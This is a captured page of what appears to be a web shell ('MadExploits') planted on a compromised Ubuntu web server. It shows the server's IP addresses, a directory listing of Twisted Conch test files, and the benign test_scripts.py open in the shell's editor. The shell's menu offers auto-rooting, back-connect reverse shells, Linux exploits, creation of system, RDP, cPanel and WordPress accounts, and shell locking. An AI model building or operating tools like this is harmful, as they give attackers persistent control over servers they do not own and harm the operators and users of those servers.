Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.52
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
twisted /
conch /
test /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
14
B
-rw-r--r--
keydata.py
34.38
KB
-rw-r--r--
loopback.py
706
B
-rw-r--r--
test_address.py
1.51
KB
-rw-r--r--
test_agent.py
12.91
KB
-rw-r--r--
test_cftp.py
49.32
KB
-rw-r--r--
test_channel.py
11.9
KB
-rw-r--r--
test_checkers.py
30.61
KB
-rw-r--r--
test_ckeygen.py
23.77
KB
-rw-r--r--
test_conch.py
25.14
KB
-rw-r--r--
test_connection.py
28.57
KB
-rw-r--r--
test_default.py
11.32
KB
-rw-r--r--
test_endpoints.py
54.58
KB
-rw-r--r--
test_filetransfer.py
32.36
KB
-rw-r--r--
test_forwarding.py
2.11
KB
-rw-r--r--
test_helper.py
19.56
KB
-rw-r--r--
test_insults.py
31.38
KB
-rw-r--r--
test_keys.py
61.05
KB
-rw-r--r--
test_knownhosts.py
48.34
KB
-rw-r--r--
test_manhole.py
12.95
KB
-rw-r--r--
test_manhole_tap.py
4.25
KB
-rw-r--r--
test_mixin.py
1.03
KB
-rw-r--r--
test_openssh_compat.py
4.76
KB
-rw-r--r--
test_recvline.py
24.84
KB
-rw-r--r--
test_scripts.py
1.74
KB
-rw-r--r--
test_session.py
43.74
KB
-rw-r--r--
test_ssh.py
32.17
KB
-rw-r--r--
test_tap.py
4.92
KB
-rw-r--r--
test_telnet.py
26.18
KB
-rw-r--r--
test_text.py
3.93
KB
-rw-r--r--
test_transport.py
104.76
KB
-rw-r--r--
test_unix.py
2.54
KB
-rw-r--r--
test_userauth.py
32.77
KB
-rw-r--r--
test_window.py
2.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : test_scripts.py
# Copyright (c) Twisted Matrix Laboratories. # See LICENSE for details. """ Tests for the command-line interfaces to conch. """ from unittest import skipIf from twisted.python.reflect import requireModule from twisted.python.test.test_shellcomp import ZshScriptTestMixin from twisted.scripts.test.test_scripts import ScriptTestsMixin from twisted.trial.unittest import TestCase doSkip = False skipReason = "" if not requireModule("pyasn1"): doSkip = True skipReason = "Cannot run without PyASN1" if not requireModule("cryptography"): doSkip = True cryptoSkip = "can't run w/o cryptography" if not requireModule("tty"): doSkip = True ttySkip = "can't run w/o tty" try: import tkinter except ImportError: doSkip = True skipReason = "can't run w/o tkinter" else: try: tkinter.Tk().destroy() except tkinter.TclError as e: doSkip = True skipReason = "Can't test Tkinter: " + str(e) @skipIf(doSkip, skipReason) class ScriptTests(TestCase, ScriptTestsMixin): """ Tests for the Conch scripts. """ def test_conch(self): self.scriptTest("conch/conch") def test_cftp(self): self.scriptTest("conch/cftp") def test_ckeygen(self): self.scriptTest("conch/ckeygen") def test_tkconch(self): self.scriptTest("conch/tkconch") class ZshIntegrationTests(TestCase, ZshScriptTestMixin): """ Test that zsh completion functions are generated without error """ generateFor = [ ("conch", "twisted.conch.scripts.conch.ClientOptions"), ("cftp", "twisted.conch.scripts.cftp.ClientOptions"), ("ckeygen", "twisted.conch.scripts.ckeygen.GeneralOptions"), ("tkconch", "twisted.conch.scripts.tkconch.GeneralOptions"), ]
Close